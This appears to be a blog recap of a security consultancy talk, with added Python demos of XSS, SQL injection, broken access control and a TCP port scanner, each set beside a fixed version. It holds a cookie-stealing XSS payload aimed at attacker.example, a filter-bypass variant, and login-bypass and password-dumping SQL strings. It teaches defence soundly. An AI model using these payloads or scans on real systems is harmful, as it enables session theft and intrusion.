On Wednesday Peter and Sam from Quantum Security broke down the basics of being a security consultant and showed us just how easy it is to get around what most people forget in system security: the basics.
What does a Security Consultant do?
Not all of security consultancy is about tech. There are heaps of different people in security consultancy and heaps of different tasks. A lot of what we hear about these days is penetration testing, or pen testing, but the reality is that consultants also do things like compliance checking, risk assessments, audits and design reviews. They test a wide range of things, everything from web apps and credit card organisations to self-service kiosks and IaaS providers.
What do we commonly see?
XSS, or Cross-Site Scripting, is one of the most common findings and turns up in around one in three applications. It usually comes down to untrusted input being written into a page without proper validation or output encoding, which lets an attacker get the victim's browser to run any script they want, starting from nothing more than a text input.
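To make the "poor input validation" point concrete, here is an added example (not code from the talk or from Quantum): a comment box rendered three ways. The first pastes the comment straight into the page, the second does the kind of blacklist "validation" people reach for first, and the third encodes the value for the HTML context it lands in, which is what framework templating does for you. The payloads, the template and the `ScriptFinder` class standing in for the browser are all constructed for the demo.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed attacker input: a comment submitted through an ordinary text field.
PAYLOAD_SCRIPT = '<script>document.location="http://attacker.example/?c="+document.cookie</script>'
# Same idea, written to survive a one-pass blacklist that strips "<script>".
PAYLOAD_NESTED = '<scr<script>ipt>document.location="http://attacker.example/?c="+document.cookie</script>'

TEMPLATE = "<div class='comment'>{}</div>"


def render_vulnerable(comment: str) -> str:
    """Drops the untrusted value straight into the page: the browser runs it."""
    return TEMPLATE.format(comment)


def render_blacklist(comment: str) -> str:
    """The usual 'input validation' mistake: strip the scary-looking tag and hope.
    One pass of re.sub turns '<scr<script>ipt>' into '<script>'."""
    return TEMPLATE.format(re.sub(r"<script>", "", comment, flags=re.IGNORECASE))


def render_safe(comment: str) -> str:
    """Encode for the HTML-text context the value lands in (what frameworks do for you)."""
    return TEMPLATE.format(escape(comment, quote=True))


class ScriptFinder(HTMLParser):
    """Stands in for the browser: flags a <script> tag or any on* event-handler attribute.
    Encoded text (&lt;script&gt;) is data, not a tag, so it is never reported."""

    def __init__(self) -> None:
        super().__init__()
        self.executable = False

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.lower().startswith("on") for name, _ in attrs):
            self.executable = True


def would_execute(page: str) -> bool:
    """True if the rendered page contains something a browser would run."""
    finder = ScriptFinder()
    finder.feed(page)
    finder.close()
    return finder.executable


if __name__ == "__main__":
    for name, render in [("vulnerable", render_vulnerable),
                         ("blacklist", render_blacklist),
                         ("safe", render_safe)]:
        print(name, "script:", would_execute(render(PAYLOAD_SCRIPT)),
              "nested:", would_execute(render(PAYLOAD_NESTED)))
```

The blacklist version looks fixed if you only try the obvious payload, which is exactly why it keeps showing up in pen test reports; encoding on output is the fix that does not depend on guessing what the attacker will type.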
SQL Injection is another very common exploit and is also the fault of poor input validation: user input is pasted straight into the text of a query instead of being passed as a parameter. That lets attackers run any SQL they want against the database, and on some database servers even operating-system commands, which can be enough to take over the server.
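As an added example (again not the speakers' code), here is the same bug in a login and a user-search endpoint against a small in-memory SQLite database, next to the parameterised versions. The table, the users and the two attacker strings are constructed for the demo; passwords are stored in plaintext only to keep it short.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed demo database standing in for an application's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password, role) VALUES (?, ?, ?)",
        [("alice", "hunter2", "admin"), ("bob", "s3cret", "user")],
    )
    return conn


def login_vulnerable(conn, username: str, password: str):
    """Pastes user input into the SQL text, so the input becomes part of the query."""
    query = (
        "SELECT username, role FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )
    return conn.execute(query).fetchone()


def login_safe(conn, username: str, password: str):
    """Parameterised query: values travel separately from the SQL and can only ever be data."""
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()


def find_user_vulnerable(conn, username: str):
    """Same mistake in a search endpoint, which is where UNION-based data extraction lives."""
    return conn.execute(
        f"SELECT username, role FROM users WHERE username = '{username}'"
    ).fetchall()


def find_user_safe(conn, username: str):
    return conn.execute(
        "SELECT username, role FROM users WHERE username = ?", (username,)
    ).fetchall()


# Constructed attacker inputs. The trailing "--" comments out the rest of the query.
BYPASS_USERNAME = "alice' --"                                   # log in as alice, any password
DUMP_USERNAME = "' UNION SELECT username, password FROM users --"  # pull every password out


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable login:", login_vulnerable(conn, BYPASS_USERNAME, "wrong"))
    print("safe login:      ", login_safe(conn, BYPASS_USERNAME, "wrong"))
    print("vulnerable search:", find_user_vulnerable(conn, DUMP_USERNAME))
    print("safe search:      ", find_user_safe(conn, DUMP_USERNAME))
```

The vulnerable login ends up executing `... WHERE username = 'alice' --' AND password = 'wrong'`, so the password check is commented out; the search endpoint returns the whole password column through the UNION. With placeholders both inputs are just strings that match nobody.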
Broken authentication and access control is another class of exploit, and it is often broken in the simplest ways, such as an endpoint that checks you are logged in but never checks that the record you asked for is actually yours. The key thing to note is that all of these are among the easiest issues to avoid: most languages and frameworks have built-in functions that encode output, parameterise queries and enforce authorisation for you. If you're interested in some other really common exploits, check out the OWASP Top Ten.
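One more added example (not from the talk) of how simple the broken case usually is: an invoice endpoint that confirms someone is logged in but never checks ownership, and an "admin only" listing that trusts a flag the client sent. The safe versions do the object-level check server-side and look the role up from the authenticated identity. Records, users and roles are constructed for the demo.

```python
# Constructed records and roles for a small invoicing app.
INVOICES = {
    101: {"owner": "alice", "amount": 120.00},
    102: {"owner": "bob", "amount": 87.50},
}
ROLES = {"alice": "user", "bob": "user", "carol": "admin"}


class Forbidden(Exception):
    """Raised when the caller may not perform the action."""


def get_invoice_vulnerable(current_user: str, invoice_id: int) -> dict:
    """Checks that *someone* is logged in, never that the invoice belongs to them:
    bob reads alice's invoice just by changing the id in the URL."""
    if not current_user:
        raise Forbidden("login required")
    return INVOICES[invoice_id]


def get_invoice_safe(current_user: str, invoice_id: int) -> dict:
    """Object-level check: the record must belong to the caller, or the caller is an admin.
    'Not yours' and 'does not exist' get the same answer so valid ids cannot be enumerated."""
    if not current_user:
        raise Forbidden("login required")
    invoice = INVOICES.get(invoice_id)
    is_admin = ROLES.get(current_user) == "admin"
    if invoice is None or (invoice["owner"] != current_user and not is_admin):
        raise Forbidden("no such invoice")
    return invoice


def list_invoices_vulnerable(current_user: str, is_admin_flag: bool) -> list:
    """Trusts a flag the client supplied (hidden form field, cookie, JSON body) to decide role."""
    if not is_admin_flag:
        raise Forbidden("admins only")
    return list(INVOICES.values())


def list_invoices_safe(current_user: str) -> list:
    """Role comes from the server-side record for the authenticated user, never from the request."""
    if ROLES.get(current_user) != "admin":
        raise Forbidden("admins only")
    return list(INVOICES.values())


def can(fn, *args) -> bool:
    """True if the call is allowed, False if it raises Forbidden."""
    try:
        fn(*args)
        return True
    except Forbidden:
        return False


if __name__ == "__main__":
    print("bob reads alice's invoice (vulnerable):", get_invoice_vulnerable("bob", 101))
    print("bob reads alice's invoice (safe):", can(get_invoice_safe, "bob", 101))
    print("bob claims admin via flag (vulnerable):", can(list_invoices_vulnerable, "bob", True))
    print("bob claims admin (safe):", can(list_invoices_safe, "bob"))
```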
Hacking Day to Day
1. The first step, as always with any form of hacking, is to get permission from your target. It's the most crucial step of the process.
2. The second step is background research. This might involve looking through existing password dumps or looking for domains that the target might be trying to hide.
3. The next step is walking into the building and making sure you look like you're supposed to be there.
4. You then want to get access to their network. Most offices don't have port security, so you can usually plug into any ethernet port and get full access. Most offices also have guest WiFi.
5. Recon is next, and it's all about finding what's on the network. You can use network scans, vulnerability scans and Active Directory to see which hosts and users are on the network.
6. The next step is gaining access. The best thing to do is make use of details that have already been exposed, like leaked passwords, and run known exploits against what recon turned up.
7. Loot everything. Take anything you can get your hands on that will help the client realise the impact of the vulnerability you've exploited: business secrets, money and passwords.
8. The last thing is writing the report. After all, if you can't explain what you did and how to fix it, then all you have done is shown there is an issue.
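The recon step is the one that is easiest to show in code, so here is an added example (not a tool from the talk or from Quantum) of the simplest network scan there is: a TCP connect scan, which counts a port as open if the handshake completes. To keep it runnable offline it scans localhost against a constructed listener and a port we know is closed; point `scan_ports` at a real host only once step 1 (permission) is done. Function names and the fake service are assumptions for the demo.

```python
import socket
import threading


def scan_ports(host: str, ports, timeout: float = 0.5) -> set:
    """TCP connect scan: a completed three-way handshake means something is listening.
    Noisy (it shows up in the target's logs) but needs no raw sockets or root."""
    open_ports = set()
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(timeout)
            if s.connect_ex((host, port)) == 0:  # 0 means connected, otherwise an errno
                open_ports.add(port)
    return open_ports


def start_fake_service(host: str = "127.0.0.1"):
    """Constructed target: a listener on an OS-chosen port standing in for a real service."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen()
    port = srv.getsockname()[1]

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:  # listener closed, demo is over
                return
            conn.close()

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def pick_closed_port(host: str = "127.0.0.1") -> int:
    """Bind and immediately release a port so we know one with nothing listening on it."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


def demo():
    """Scan one closed and one listening port; returns (open_port, closed_port, found)."""
    srv, open_port = start_fake_service()
    closed_port = pick_closed_port()
    try:
        found = scan_ports("127.0.0.1", [closed_port, open_port])
    finally:
        srv.close()
    return open_port, closed_port, found


if __name__ == "__main__":
    open_port, closed_port, found = demo()
    print(f"listening on {open_port}, nothing on {closed_port}; scanner found {sorted(found)}")
```

Real recon tools add service and version detection on top of this, and the Active Directory side of step 5 is a separate set of queries against the domain controller rather than a port scan, but the idea is the same: find out what is there before you try anything against it.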
What is a lab and why should you get one?
A lab is an environment that can be used for testing something without having to test on a real product. So why would you want a lab when you could just test on real targets? Because the first thing you should do when penetration testing is ask for permission if you don't own the target; if you do own it, you only need to ask yourself. The best thing about having unlimited access to a lab is that you're able to freely test out exploits, get a better understanding of how they work and potentially even make some money.
Setting up a lab
The easiest way to set up a lab is with virtual machines. That way you don't have to fork out lots of money for multiple physical machines. The two key parts of a lab are the attacker, the machine you launch exploits from, and the victim, the machine you try exploits on. The last thing you'll need is a bunch of tutorials or some exploits to try out. Here are a few things that can get you started.
There are some purpose-built attacker setups you can use. The most common one is Kali Linux, and it's the one used at Quantum; there's also the Metasploit Framework, and multiple tools that can be found on GitHub. If you're targeting Windows machines then Sysinternals is a good choice.
The next thing is something you can exploit. Some common targets people use are WebGoat, Metasploitable and VulnHub.